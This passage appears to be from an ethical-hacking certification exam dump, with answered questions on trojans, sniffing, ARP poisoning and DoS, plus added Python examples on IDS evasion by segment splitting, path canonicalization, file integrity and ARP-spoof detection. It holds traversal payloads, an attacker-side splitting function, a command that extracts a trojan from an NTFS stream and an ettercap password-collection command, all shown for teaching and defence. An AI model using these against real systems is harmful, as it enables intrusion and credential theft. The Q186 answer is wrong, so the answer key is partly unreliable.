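    skip retransmitted duplicates, trim overlaps, stop at the first gap."""
    stream = bytearray()
    expected = isn
    for seg in sorted(segments, key=lambda s: s.seq):
        if seg.seq + len(seg.payload) <= expected:
            continue                       # entirely old data (retransmit)
        if seg.seq > expected:
            break                          # hole: cannot continue yet
        stream += seg.payload[expected - seg.seq:]   # drop any overlap
        expected = seg.seq + len(seg.payload)
    return bytes(stream)


def stream_alert(segments, isn: int) -> bool:
    """Stream-aware matcher: search the reassembled data, not the packets."""
    return SIGNATURE.search(reassemble(segments, isn)) is not None


def splice(request: bytes, isn: int, size: int = 2):
    """Attacker side: deliver the request in `size`-byte segments."""
    return [Segment(isn + i, request[i:i + size])
            for i in range(0, len(request), size)]


# Constructed sample: a traversal request and an arbitrary initial sequence number.
REQUEST = b"GET /cgi-bin/../../../etc/passwd HTTP/1.0\r\n\r\n"
ISN = 1000

if __name__ == "__main__":
    segs = splice(REQUEST, ISN)
    print("per-packet alerts:", per_packet_alerts(segs))
    print("stream alert     :", stream_alert(segs, ISN))
```

This is why Snort's stream preprocessor and Suricata reassemble TCP sessions before applying content rules; the evasion only works against a sensor that matches packet by packet, and a sensor that cannot keep state long enough to reassemble a slow trickle of segments fails open.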
QUESTION 174:
Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products?
A. Covert keylogger
B. Stealth keylogger
C. Software keylogger
D. Hardware keylogger
Answer: D
Explanation: A hardware keylogger sits between the keyboard and the computer and never interacts with the operating system, so anti-virus and anti-spyware products have nothing to inspect; only a physical inspection of the machine will find it.
QUESTION 175:
_____ is the process of converting something from one representation to the simplest form. It deals with the way in which systems convert data from one form to another.
A. Canonicalization
B. Character Mapping
C. Character Encoding
D. UCS transformation formats
Answer: A
Explanation: Canonicalization (abbreviated c14n) is the process of converting data that has more than one possible representation into a "standard" canonical representation. This is done to compare different representations for equivalence, to count the number of distinct data structures (e.g., in combinatorics), to improve the efficiency of various algorithms by eliminating repeated calculations, or to make it possible to impose a meaningful sorting order. The security relevance: a check made on a non-canonical form (a percent-encoded path, a name containing '..' segments or mixed case) can be bypassed by an equivalent spelling, so input must be canonicalized before any access decision is taken.
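An added example (not code from the original page) of canonicalization applied to a path check: decode until stable to defeat double encoding, fold Unicode compatibility forms and backslashes, collapse '.' and '..', and only then decide whether the result stays under the document root. The base directory and the attack strings are constructed for the illustration; naive_check is the vulnerable pattern the hardened safe_join replaces.

```python
import posixpath
import unicodedata
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 4    # policy: deeper nesting than this is treated as hostile


def canonicalize(path: str) -> str:
    """Reduce the many spellings of a path to one form before any decision."""
    for _ in range(MAX_DECODE_ROUNDS + 1):
        decoded = unquote(path)            # decode until a fixed point: catches %252e
        if decoded == path:
            break
        path = decoded
    else:
        raise ValueError("too many layers of percent-encoding")
    path = unicodedata.normalize("NFKC", path)   # fullwidth '．' (U+FF0E) -> '.'
    path = path.replace("\\", "/")               # Windows separator -> '/'
    return posixpath.normpath(path)              # collapse '.', '..' and '//'


def safe_join(base: str, user_path: str) -> str:
    """Hardened form: canonicalize first, then check containment on the result."""
    base = posixpath.normpath(base)
    canon = canonicalize(user_path)
    if canon.startswith("/"):
        raise PermissionError(f"absolute path rejected: {user_path!r}")
    target = posixpath.normpath(posixpath.join(base, canon))
    if target != base and not target.startswith(base + "/"):
        raise PermissionError(f"{user_path!r} resolves to {target}, outside {base}")
    return target


def naive_check(base: str, user_path: str) -> str:
    """Vulnerable form: decides on the raw string, so '%2e%2e/' sails through
    and is decoded later by the file-serving layer."""
    if ".." in user_path:
        raise PermissionError("traversal attempt")
    return base + "/" + user_path


BASE = "/var/www/files"    # constructed document root for the example

if __name__ == "__main__":
    for p in ("reports/q3.pdf", "%2e%2e/%2e%2e/etc/passwd", "%252e%252e%252fetc/passwd"):
        try:
            print(p, "->", safe_join(BASE, p))
        except (PermissionError, ValueError) as exc:
            print(p, "-> rejected:", exc)
```

The order matters: decode, normalize, then check. Checking first and decoding later is exactly the bug behind the classic IIS Unicode and double-decode traversals, and the same principle applies to hostnames, usernames and any other identifier that has more than one spelling.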
QUESTION 176:
DRAG DROP
Drag the term to match with it's description
Exhibit:

Answer:

QUESTION 177:
You are an Administrator of a Windows server. You want to find the port number for
POP3. What file would you find the information in and where?
Select the best answer.
A. %windir%\etc\services
B. system32\drivers\etc\services
C. %windir%\system32\drivers\etc\services
D. /etc/services
E. %windir%/system32/drivers/etc/services
Answer: C
Explanations:
%windir%\system32\drivers\etc\services is the correct place to look for this information.
QUESTION 178:
One of your junior administrators is concerned with Windows LM hashes and password cracking. In your discussion with them, which of the following are true statements that you would point out?
Select the best answers.
A. John the Ripper can be used to crack a variety of passwords, but one limitation is that the output doesn't show if the password is upper or lower case.
B. By using NTLMv1, you have implemented an effective countermeasure to password cracking.
C. SYSKEY is an effective countermeasure.
D. If a Windows LM password is 7 characters or less, the hash will be passed with the following characters, in HEX- 00112233445566778899.
E. Enforcing Windows complex passwords is an effective countermeasure.
Answer: A, C, E
Explanations:
John the Ripper can be used to crack a variety of passwords; it is a very effective cracker that handles hash formats from many different operating systems. One limitation is that for LM hashes its output does not show whether the password is upper or lower case, because LM upper-cases the password before hashing it. Using NTLMv1 is not an effective countermeasure; NTLM version 2 (NTLMv2) is the countermeasure to LM password cracking. To enforce it, set Windows 9x and NT systems to "send NTLMv2 responses only". SYSKEY is an effective countermeasure: it uses 128-bit encryption on the local copy of the Windows SAM. If a Windows LM password is 7 characters or less, the second half of the hash is the constant value
0xAAD3B435B51404EE
(the LM hash of an empty half), which is why seeing this value in a dump immediately reveals a short password. Enforcing Windows complex passwords is an effective countermeasure to password cracking. Complex passwords are at least 6 characters long and contain any 3 of the following 4 categories: upper case, lower case, special characters and numbers.
QUESTION 179:
In the following example, which of these is the "exploit"?
Today, Microsoft Corporation released a security notice. It detailed how a person could bring down the Windows 2003 Server operating system, by sending malformed packets to it. They detailed how this malicious process had been automated using basic scripting. Even worse, the new automated method for bringing down the server has already been used to perform denial of service attacks on many large commercial websites.
Select the best answer.
A. Microsoft Corporation is the exploit.
B. The security "hole" in the product is the exploit.
C. Windows 2003 Server
D. The exploit is the hacker that would use this vulnerability.
E. The documented method of how to use the vulnerability to gain unprivileged access.
Answer: E
Explanations:
Microsoft is not the exploit, but if Microsoft documents how the vulnerability can be used to gain unprivileged access, it is creating the exploit. If they just say that there is a hole in the product, then it is only a vulnerability. The security "hole" in the product is called the "vulnerability"; once it is documented in a way that shows how to use it to gain unprivileged access, that documented method becomes an "exploit". In the example given, Windows 2003 Server is the TOE (Target of Evaluation). A TOE is an IT system, product or component that requires security evaluation or is being identified. The hacker who would use this vulnerability is exploiting it, but the hacker is not the exploit. The documented method of how to use the vulnerability to gain unprivileged access is the correct answer.
QUESTION 180:
Assuming two systems are using IPSec to protect traffic over the Internet, what type of general attack could compromise the data?
A. Spoof Attack
B. Smurf Attack
C. Man in the Middle Attack
D. Trojan Horse Attack
E. Back Orifice Attack
Answer: D, E
Explanation:
To compromise the data, the attack would need to be executed before the encryption takes place at either end of the tunnel. Trojan Horse and Back Orifice attacks both allow for potential data manipulation on host computers. In both cases, the data would be compromised either before encryption or after decryption, so IPsec is not preventing the attack.
QUESTION 181:
What is a Trojan Horse?
A. A malicious program that captures your username and password
B. Malicious code masquerading as or replacing legitimate code
C. An unauthorized user who gains access to your user database and adds themselves as a user
D. A server that is to be sacrificed to all hacking attempts in order to log and monitor the hacking activity
Answer: B
Explanation:
A Trojan Horse is an apparently useful and innocent program containing additional hidden code which allows the unauthorized collection, exploitation, falsification, or destruction of data.

QUESTION 182:
You want to use netcat to generate a huge amount of useless network data continuously for performance testing between 2 hosts.
Which of the following commands accomplish this?
A. Machine A
#yes AAAAAAAAAAAAAAAAAAAAAA | nc -v -v -l -p 2222 > /dev/null
Machine B
#yes BBBBBBBBBBBBBBBBBBBBBB | nc machinea 2222 > /dev/null
B. Machine A cat somefile | nc -v -v -l -p 2222
Machine B cat somefile | nc othermachine 2222
C. Machine A nc -l -p 1234 | uncompress -c | tar xvfp
Machine B tar cfp - /some/dir | compress -c | nc -w 3 machinea 1234
D. Machine A while true : do nc -v -l -s -p 6000 machineb 2
Machine B while true ; do nc -v -l -s -p 6000 machinea 2 done
Answer: A
Explanation:
Machine A sets up a listener on port 2222 using the nc command and has the letter A sent an infinite number of times; when yes is used to send data it NEVER stops until it receives a break signal from the terminal (Control+C). On the client end (machine B), nc is used as a client to connect to machine A, sending the letter B an infinite number of times. Once both ends have established the TCP connection, each is infinitely sending data to the other, and this process will run FOREVER until it has been stopped by an administrator or the attacker.
QUESTION 183:
In the context of Trojans, what is the definition of a Wrapper?
A. An encryption tool to protect the Trojan.
B. A tool used to bind the Trojan with legitimate file.
C. A tool used to encapsulated packets within a new header and footer.
D. A tool used to calculate bandwidth and CPU cycles wasted by the Trojan.
Answer: B
Explanation: These wrappers allow an attacker to take any executable back-door program and combine it with any legitimate executable, creating a Trojan horse without writing a single line of new code.
QUESTION 184:
After an attacker has successfully compromised a remote computer, what would be one of the last steps that would be taken to ensure that the compromise is not traced back to the source of the problem?
A. Install patches
B. Setup a backdoor
C. Cover your tracks
D. Install a zombie for DDOS
Answer: C
Explanation: As a hacker you don't want to leave any traces that could lead back to you.
QUESTION 185:
Which of the following statements would not be a proper definition for a Trojan
Horse?
A. An unauthorized program contained within a legitimate program.
This unauthorized program performs functions unknown (and probably unwanted) by the user.
B. A legitimate program that has been altered by the placement of unauthorized code within it; this code performs functions unknown (and probably unwanted) by the user.
C. An authorized program that has been designed to capture keyboard keystrokes while the user remains unaware of such an activity being performed.
D. Any program that appears to perform a desirable and necessary function but that
(because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.
Answer: C
Explanation: A Trojan is all about running unauthorized code on the user's computer without the user knowing of it.
QUESTION 186:

You have hidden a Trojan file virus.exe inside another file readme.txt using NTFS streaming. Which command would you execute to extract the Trojan to a standalone file?
A. c:\> type readme.txt:virus.exe > virus.exe
B. c:\> more readme.txt | virus.exe > virus.exe
C. c:\> cat readme.txt:virus.exe > virus.exe
D. c:\> list redme.txt$virus.exe > virus.exe
Answer: C
Explanation: cat will concatenate, or write, the alternate data stream to its own file named virus.exe
QUESTION 187:
You suspect that your Windows machine has been compromised with a Trojan virus. When you run anti-virus software it does not pick up the Trojan. Next you run the netstat command to look for open ports and you notice a strange port 6666 open.
What is the next step you would do?
A. Re-install the operating system.
B. Re-run anti-virus software.
C. Install and run Trojan removal software.
D. Run utility fport and look for the application executable that listens on port 6666.
Answer: D
Explanation: Fport reports all open TCP/IP and UDP ports and maps them to the owning application. This is the same information you would see using the 'netstat -an' command, but it also maps those ports to running processes with the PID, process name and path. Fport can be used to quickly identify unknown open ports and their associated applications.
QUESTION 188:
In Linux, the three most common commands that hackers usually attempt to Trojan are:
A. car, xterm, grep
B. netstat, ps, top
C. vmware, sed, less
D. xterm, ps, nc
Answer: B

Explanation:
The easiest and smartest programs to trojan are the ones commonly run by administrators and users, in this case netstat, ps, and top. For a complete list of commonly trojaned and rootkited software, please reference this URL: http://www.usenix.org/publications/login/1999-9/features/rootkits.html
QUESTION 189:
John wishes to install a new application onto his Windows 2000 server.
He wants to ensure that any application he uses has not been Trojaned.
What can he do to help ensure this?
A. Compare the file's MD5 signature with the one published on the distribution media
B. Obtain the application via SSL
C. Compare the file's virus signature with the one published on the distribution media
D. Obtain the application from a CD-ROM disc
Answer: A
Explanation: MD5 was developed by Professor Ronald L. Rivest of MIT. What it does, to quote the executive summary of RFC 1321, is:
[The MD5 algorithm] takes as input a message of arbitrary length and produces as output a 128-bit "fingerprint" or "message digest" of the input. It is conjectured that it is computationally infeasible to produce two messages having the same message digest, or to produce any message having a given prespecified target message digest. The MD5 algorithm is intended for digital signature applications, where a large file must be "compressed" in a secure manner before being encrypted with a private (secret) key under a public-key cryptosystem such as RSA.
In essence, MD5 is a way to verify data integrity, and is much more reliable than a checksum and many other commonly used methods.
QUESTION 190:
Jason's Web server was attacked by a trojan virus. He runs a protocol analyzer and notices that the trojan communicates with a remote server on the Internet. Shown below is the standard "hexdump" representation of the network packet, before being decoded. Jason wants to identify the trojan by looking at the destination port number and mapping it to a trojan-port number database on the Internet. Identify the remote server's port number by decoding the packet.
A. Port 1890 (Net-Devil Trojan)
B. Port 1786 (Net-Devil Trojan)
C. Port 1909 (Net-Devil Trojan)
D. Port 6667 (Net-Devil Trojan)
Answer: D
Explanation: From the trace, 0x1A0B is 6667, the port used by IRC (Internet Relay Chat), which is one port used. Other ports are in the 900's.
QUESTION 191:
Which of the following Netcat commands would be used to perform a UDP scan of the lower 1024 ports?
A. Netcat -h -U
B. Netcat -hU
C. Netcat -sU -p 1-1024
D. Netcat -u -v -w2 1-1024
E. Netcat -sS -O target/1024
Answer: D
Explanation: The proper syntax for a UDP scan using Netcat is "Netcat -u -v -w2 1-1024". Netcat is considered the Swiss-army knife of hacking tools because it is so versatile.
QUESTION 192:
Sniffing is considered an active attack.
A. True
B. False
Answer: B
Explanation: Sniffing is considered a passive attack.
QUESTION 193:
A file integrity program such as Tripwire protects against Trojan horse attacks by:
A. Automatically deleting Trojan horse programs
B. Rejecting packets generated by Trojan horse programs
C. Using programming hooks to inform the kernel of Trojan horse behavior
D. Helping you catch unexpected changes to a system utility file that might indicate it had been replaced by a Trojan horse
Answer: D
Explanation: Tripwire generates a database of the most common files and directories on your system. Once it is generated, you can then check the current state of your system against the original database and get a report of all the files that have been modified, deleted or added. This comes in handy if you allow other people access to your machine, and even if you don't, if someone else does get access, you'll know if they tried to modify files such as /bin/login etc.
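Both the published-digest comparison of QUESTION 189 and the Tripwire-style baseline of QUESTION 193 come down to hashing files and comparing the result, so here is one added Python example (not Tripwire's code, nor part of the exam material) that does both: `matches_published_digest` checks a file against the digest shipped with it, and `build_baseline`/`compare_baseline` record and diff a directory tree. The demo functions build a throw-away directory with constructed file contents so the example runs offline; SHA-256 for the baseline is my choice, MD5 is used for the published-digest check only because the question specifies it.

```python
"""File-integrity checks for the MD5 comparison (Q189) and Tripwire-style
baseline (Q193) discussed above.  Added example; all file contents are constructed.
"""
import hashlib
import hmac
import tempfile
from pathlib import Path


def file_digest(path, algorithm="sha256", chunk_size=65536):
    """Hash a file in chunks so large binaries do not have to fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def matches_published_digest(path, published_hex, algorithm="md5"):
    """Q189: compare a downloaded file against the digest published with it."""
    return hmac.compare_digest(file_digest(path, algorithm), published_hex.strip().lower())


def build_baseline(root):
    """Q193: record digest, size and mode for every file under root."""
    root = Path(root)
    baseline = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            st = p.stat()
            baseline[p.relative_to(root).as_posix()] = {
                "sha256": file_digest(p),
                "size": st.st_size,
                "mode": st.st_mode,
            }
    return baseline


def compare_baseline(root, baseline):
    """Report which files were added, deleted or modified since the baseline."""
    current = build_baseline(root)
    return {
        "added": sorted(set(current) - set(baseline)),
        "deleted": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys()
                           if baseline[k] != current[k]),
    }


def demo_published_check():
    """Uses the RFC 1321 test vector MD5("abc") = 900150983cd24fb0d6963f7d28e17f72."""
    with tempfile.TemporaryDirectory() as d:
        f = Path(d) / "setup.exe"          # constructed stand-in for a download
        f.write_bytes(b"abc")
        good = matches_published_digest(f, "900150983cd24fb0d6963f7d28e17f72")
        bad = matches_published_digest(f, "00000000000000000000000000000000")
    return good, bad


def demo_baseline_check():
    """Baseline a fake bin/, then replace one utility, drop a new file and delete another."""
    with tempfile.TemporaryDirectory() as d:
        bin_dir = Path(d) / "bin"
        bin_dir.mkdir()
        (bin_dir / "login").write_bytes(b"#!/bin/sh\nexec /sbin/real-login \"$@\"\n")
        (bin_dir / "ls").write_bytes(b"constructed stand-in for the ls binary")
        (bin_dir / "ps").write_bytes(b"constructed stand-in for the ps binary")
        baseline = build_baseline(d)

        # Simulated trojaning of /bin/login: same length as before, so a
        # size-only check would miss it, but the digest changes.
        (bin_dir / "login").write_bytes(b"#!/bin/sh\nexec /sbin/fake-login \"$@\"\n")
        (bin_dir / "nc").write_bytes(b"constructed stand-in for a dropped tool")
        (bin_dir / "ls").unlink()
        return compare_baseline(d, baseline)


if __name__ == "__main__":
    print("published digest check (good, bad):", demo_published_check())
    print("baseline report:", demo_baseline_check())
```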
QUESTION 194:
Erik notices a big increase in UDP packets sent to port 1026 and 1027 occasionally.
He enters the following at the command prompt.
$ nc -l -p 1026 -u -v
In response, he sees the following message.
cell(?(c)????STOPALERT77STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION.
Windows has found 47 Critical Errors.
To fix the errors please do the following:
1. Download Registry Repair from: www.reg-patch.com
2. Install Registry Repair
3. Run Registry Repair
4. Reboot your computer
FAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION!
What would you infer from this alert?
A. The machine is redirecting traffic to www.reg-patch.com using adware
B. It is a genuine fault of windows registry and the registry needs to be backed up
C. An attacker has compromised the machine and backdoored ports 1026 and 1027
D. It is a messenger spam. Windows creates a listener on one of the low dynamic ports from 1026 to 1029 and the message usually promotes malware disguised as legitimate utilities
Answer: D
Explanation: The "net send" Messenger service can be used by unauthorized users of your computer, without gaining any kind of privileged access, to cause a pop-up window to appear on your computer. Lately, this feature has been used by unsolicited commercial advertisers to inform many campus users about a "university diploma service"...
QUESTION 195:
Exhibit:
ettercap -NCLzs --quiet
What does the command in the exhibit do in "Ettercap"?
A. This command will provide you the entire list of hosts in the LAN
B. This command will check if someone is poisoning you and will report its IP.
C. This command will detach from console and log all the collected passwords from the network to a file.
D. This command broadcasts ping to scan the LAN instead of ARP request of all the subnet IPs.
Answer: C
Explanation:
-N = NON interactive mode (without ncurses)
-C = collect all users and passwords
-L = if used with -C (collector) it creates a file with all the password sniffed in the session in the form "YYYYMMDD-collected-pass.log"
-z = start in silent mode (no arp storm on start up)
-s = IP BASED sniffing
--quiet = "demonize" ettercap. Useful if you want to log all data in background.
QUESTION 196:
A remote user tries to login to a secure network using Telnet, but accidentally types in an invalid user name or password. Which responses would NOT be preferred by an experienced Security Manager? (multiple answer)
A. Invalid Username
B. Invalid Password
C. Authentication Failure
D. Login Attempt Failed
E. Access Denied
Answer: A, B
Explanation:
As little information as possible should be given about a failed login attempt. Invalid username or password is not desirable.
QUESTION 197:
A POP3 client contacts the POP3 server:
A. To send mail
B. To receive mail
C. to send and receive mail
D. to get the address to send mail to
E. initiate a UDP SMTP connection to read mail
Answer: B
Explanation: POP is used to receive e-mail.
SMTP is used to send e-mail.

QUESTION 198:
Samantha was hired to perform an internal security test of Certkiller. She quickly realized that all networks are making use of switches instead of traditional hubs.
This greatly limits her ability to gather information through network sniffing.
Which of the following techniques can she use to gather information from the switched network or to disable some of the traffic isolation features of the switch?
(Choose two)
A. Ethernet Zapping
B. MAC Flooding
C. Sniffing in promiscuous mode
D. ARP Spoofing
Answer: B, D
Explanation: In a typical MAC flooding attack, a switch is flooded with packets, each containing different source MAC addresses. The intention is to consume the limited memory set aside in the switch to store the MAC address-to-physical port translation table. The result of this attack causes the switch to enter a state called fail-open mode, in which all incoming packets are broadcast out on all ports (as with a hub), instead of just down the correct port as per normal operation. The principle of ARP spoofing is to send fake, or 'spoofed', ARP messages to an Ethernet LAN. These frames contain false MAC addresses, confusing network devices, such as network switches. As a result, frames intended for one machine can be mistakenly sent to another (allowing the packets to be sniffed) or to an unreachable host (a denial of service attack).
QUESTION 199:
Ethereal works best on ____________.
A. Switched networks
B. Linux platforms
C. Networks using hubs
D. Windows platforms
E. LAN's
Answer: C
Explanation: Ethereal is used for sniffing traffic. It will return the best results when used on an unswitched (i.e., hub) network.
QUESTION 200:
The following is an email header. What address is that of the true originator of the message?
Return-Path:
Received: from smtp.com (fw.emumail.com [215.52.220.122]) by raq-221-181.ev1.net (8.10.2/8.10.2) with ESMTP id h78NIn404807 for ; Sat, 9 Aug 2003 18:18:50 -0500
Received: (qmail 12685 invoked from network); 8 Aug 2003 23:25:25 -0000
Received: from ([19.25.19.10]) by smtp.com with SMTP
Received: from unknown (HELO CHRISLAPTOP) (168.150.84.123) by localhost with SMTP; 8 Aug 2003 23:25:01 -0000
From: "Bill Gates"
To: "mikeg"
Subject: We need your help!
Date: Fri, 8 Aug 2003 19:12:28 -0400
Message-ID:
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0052_01C35DE1.03202950"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
A. 19.25.19.10
B. 51.32.123.21
C. 168.150.84.123
D. 215.52.220.122
E. 8.10.2/8.10.2
Answer: C
Explanation: Spoofing can be easily achieved by manipulating the "from" name field; however, it is much more difficult to hide the true source address. The "received from" IP address 168.150.84.123 is the true source of the
QUESTION 201:
Bob wants to prevent attackers from sniffing his passwords on the wired network.
Which of the following lists the best options?
A. RSA, LSA, POP
B. SSID, WEP, Kerberos
C. SMB, SMTP, Smart card
D. Kerberos, Smart card, Stanford SRP

Answer: D
Explanation: Kerberos, Smart cards and Stanford SRP are techniques where the password never leaves the computer.
QUESTION 202:
Which tool/utility can help you extract the application layer data from each TCP connection from a log file into separate files?
A. Snort
B. argus
C. TCPflow
D. Tcpdump
Answer: C
Explanation: Tcpflow is a program that captures data transmitted as part of TCP connections (flows), and stores the data in a way that is convenient for protocol analysis or debugging. A program like 'tcpdump' shows a summary of packets seen on the wire, but usually doesn't store the data that's actually being transmitted. In contrast, tcpflow reconstructs the actual data streams and stores each flow in a separate file for later analysis.
QUESTION 203:
Which of the following display filters will you enable in Ethereal to view the three-way handshake for a connection from host 192.168.0.1?
A. ip == 192.168.0.1 and tcp.syn
B. ip.addr = 192.168.0.1 and syn = 1
C. ip.addr==192.168.0.1 and tcp.flags.syn
D. ip.equals 192.168.0.1 and syn.equals on
Answer: C
QUESTION 204:
John the hacker is sniffing the network to inject ARP packets. He injects broadcast frames onto the wire to conduct MiTM attack. What is the destination MAC address of a broadcast frame?
A. 0xFFFFFFFFFFFF
B. 0xAAAAAAAAAAAA
C. 0xBBBBBBBBBBBB
D. 0xDDDDDDDDDDDD
Answer: A
Explanation: 0xFFFFFFFFFFFF is the destination MAC address of the broadcast frame.
QUESTION 205:
When Jason moves a file via NFS over the company's network, you want to grab a copy of it by sniffing. Which of the following tool accomplishes this?
A. macof
B. webspy
C. filesnarf
D. nfscopy
Answer: C
Explanation: filesnarf - sniff files from NFS traffic
OPTIONS
-i interface
Specify the interface to listen on.
-v
"Versus" mode. Invert the sense of matching, to select non-matching files.
pattern
Specify regular expression for filename matching.
expression
Specify a tcpdump(8) filter expression to select traffic to sniff.
SEE ALSO
dsniff, nfsd
QUESTION 206:
What port number is used by Kerberos protocol?
A. 44
B. 88
C. 419
D. 487
Answer: B
Explanation: Kerberos traffic uses UDP/TCP protocol source and destination port 88.

QUESTION 207:
Which of the following is not considered to be a part of active sniffing?
A. MAC Flooding
B. ARP Spoofing
C. SMAC Fueling
D. MAC Duplicating
Answer: C
QUESTION 208:
What is the command used to create a binary log file using tcpdump?
A. tcpdump -r log
B. tcpdump -w ./log
C. tcpdump -vde -r log
D. tcpdump -l /var/log/
Answer: B
Explanation: tcpdump [ -adeflnNOpqStvx ] [ -c count ] [ -F file ] [ -i interface ] [ -r file ] [ -s snaplen ] [ -T type ] [ -w file ] [ expression ]
-w Write the raw packets to file rather than parsing and printing them out.
QUESTION 209:
ARP poisoning is achieved in _____ steps
A. 1
B. 2
C. 3
D. 4
Answer: B
Explanation: The hacker begins by sending a malicious ARP "reply" (for which there was no previous request) to your router, associating his computer's MAC address with your IP address. Now your router thinks the hacker's computer is your computer. Next, the hacker sends a malicious ARP reply to your computer, associating his MAC address with the router's IP address. Now your machine thinks the hacker's computer is your router. The hacker has now used ARP poisoning to accomplish a MitM attack.
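As an added example (not part of the exam material), the following Python monitor detects the two-step poisoning just described from tcpdump-style ARP output: it flags replies that answer no outstanding request, IP-to-MAC bindings that change, and one MAC answering for more than one IP. The trace lines, addresses and MACs are constructed.

```python
"""Detector for the two-step ARP poisoning described above (added example).

Input lines imitate 'tcpdump -n arp' output; all addresses are constructed.
"""
import re

ARP_REQUEST = re.compile(r"ARP, Request who-has (\S+) tell (\S+)")
ARP_REPLY = re.compile(r"ARP, Reply (\S+) is-at ([0-9A-Fa-f:]{17})")


def analyze_arp(lines):
    """Return a list of (alert, subject, detail) tuples in the order they fire."""
    bindings = {}     # ip -> mac learned from the first reply seen
    pending = set()   # ips someone asked about and nobody has answered yet
    claimed = {}      # mac -> set of ips it has claimed
    alerts = []
    for line in lines:
        m = ARP_REQUEST.search(line)
        if m:
            pending.add(m.group(1))
            continue
        m = ARP_REPLY.search(line)
        if not m:
            continue
        ip, mac = m.group(1), m.group(2).lower()
        if ip in pending:
            pending.discard(ip)
        else:
            # A reply nobody asked for is the malicious "reply" from the explanation.
            alerts.append(("unsolicited-reply", ip, mac))
        previous = bindings.setdefault(ip, mac)
        if previous != mac:
            alerts.append(("binding-changed", ip, f"{previous} -> {mac}"))
            bindings[ip] = mac
        claimed.setdefault(mac, set()).add(ip)
        if len(claimed[mac]) > 1:
            # One MAC answering for both the router and the victim is the MitM position
            # (a heuristic: a host with several IPs on one interface also trips it).
            alerts.append(("mac-claims-multiple-ips", mac, sorted(claimed[mac])))
    return alerts


# Constructed trace: two legitimate exchanges, then the two poisoning replies.
SAMPLE_TRACE = [
    "12:00:01.000000 ARP, Request who-has 192.168.1.1 tell 192.168.1.50, length 28",
    "12:00:01.000400 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01, length 28",
    "12:00:05.000000 ARP, Request who-has 192.168.1.50 tell 192.168.1.1, length 28",
    "12:00:05.000300 ARP, Reply 192.168.1.50 is-at 00:11:22:33:44:50, length 28",
    # Step 1 of the explanation: the router is told the victim's IP is at the attacker's MAC.
    "12:00:09.000000 ARP, Reply 192.168.1.50 is-at de:ad:be:ef:00:99, length 28",
    # Step 2: the victim is told the router's IP is at the attacker's MAC.
    "12:00:09.100000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:99, length 28",
]

if __name__ == "__main__":
    for alert in analyze_arp(SAMPLE_TRACE):
        print(alert)
```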

QUESTION 210:
How would you describe a simple yet very effective mechanism for sending and receiving unauthorized information or data between machines without alerting any firewalls and IDS's on a network?
A. Covert Channel
B. Crafted Channel
C. Bounce Channel
D. Deceptive Channel
Answer: A
Explanation: A covert channel is described as: "any communication channel that can be exploited by a process to transfer information in a manner that violates the system's security policy." Essentially, it is a method of communication that is not part of an actual computer system design, but can be used to transfer information to users or system processes that normally would not be allowed access to the information.
QUESTION 211:
Exhibit:

You have captured some packets in Ethereal. You want to view only packets sent from 10.0.0.22. What filter will you apply?
A. ip = 10.0.0.22
B. ip.src == 10.0.0.22
C. ip.equals 10.0.0.22
D. ip.address = 10.0.0.22
Answer: B
Explanation: ip.src tells the filter to only show packets with 10.0.0.22 as the source.
QUESTION 212:
Certkiller, the evil hacker, is purposely sending fragmented ICMP packets to a remote target. The total size of this ICMP packet once reconstructed is over 65,536 bytes. From the information given, what type of attack is Certkiller attempting to perform?
A. Syn flood
B. Smurf
C. Ping of death
D. Fraggle
Answer: C
Reference: http://insecure.org/sploits/ping-o-death.html
QUESTION 213:
Which one of the following instigates a SYN flood attack?
A. Generating excessive broadcast packets.
B. Creating a high number of half-open connections.
C. Inserting repetitive Internet Relay Chat (IRC) messages.
D. A large number of Internet Control Message Protocol (ICMP) traces.
Answer: B
Explanation: A SYN attack occurs when an attacker exploits the use of the buffer space during a Transmission Control Protocol (TCP) session initialization handshake. The attacker floods the target system's small "in-process" queue with connection requests, but it does not respond when a target system replies to those requests. This causes the target system to time out while waiting for the proper response, which makes the system crash or become unusable.
QUESTION 214:

Global deployment of RFC 2827 would help mitigate what classification of attack?
A. Sniffing attack
B. Denial of service attack
C. Spoofing attack
D. Reconnaissance attack
E. Port Scan attack
Answer: C
Explanation:
RFC 2827 - Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing
QUESTION 215:
What happens when one experiences a ping of death?
A. This is when an IP datagram is received with the "protocol" field in the IP header set to 1 (ICMP) and the "type" field in the ICMP header is set to 18 (Address Mask Reply).
B. This is when an IP datagram is received with the "protocol" field in the IP header set to 1 (ICMP), the Last Fragment bit is set, and (IP offset * 8) + (IP data length) > 65535.
In other words, the IP offset (which represents the starting position of this fragment in the original packet, and which is in 8-byte units) plus the rest of the packet is greater than the maximum size for an IP packet.
C. This is when an IP datagram is received with the "protocol" field in the IP header set to 1 (ICMP) and the source equal to destination address.
D. This is when the IP header is set to 1 (ICMP) and the "type" field in the ICMP header is set to 5 (Redirect).
Answer: B
Explanation:
A hacker can send an IP packet to a vulnerable machine such that the last fragment contains an offset where (IP offset * 8) + (IP data length) > 65535. This means that when the packet is reassembled, its total length is larger than the legal limit, causing buffer overruns in the machine's OS (because the buffer sizes are defined only to accommodate the maximum allowed size of the packet based on RFC 791). IDS can generally recognize such attacks by looking for packet fragments that have the IP header's protocol field set to 1 (ICMP), the last bit set, and (IP offset * 8) + (IP data length) > 65535. (CCIE Professional Development: Network Security Principles and Practices by Saadat Malik, pg. 414)
"Ping of Death" attacks cause systems to react in an unpredictable fashion when receiving oversized IP packets. TCP/IP allows for a maximum packet size of up to 65536 octets (1 octet = 8 bits of data), containing a minimum of 20 octets of IP header information and zero or more octets of optional information, with the rest of the packet being data. Ping of Death attacks can cause crashing, freezing, and rebooting.
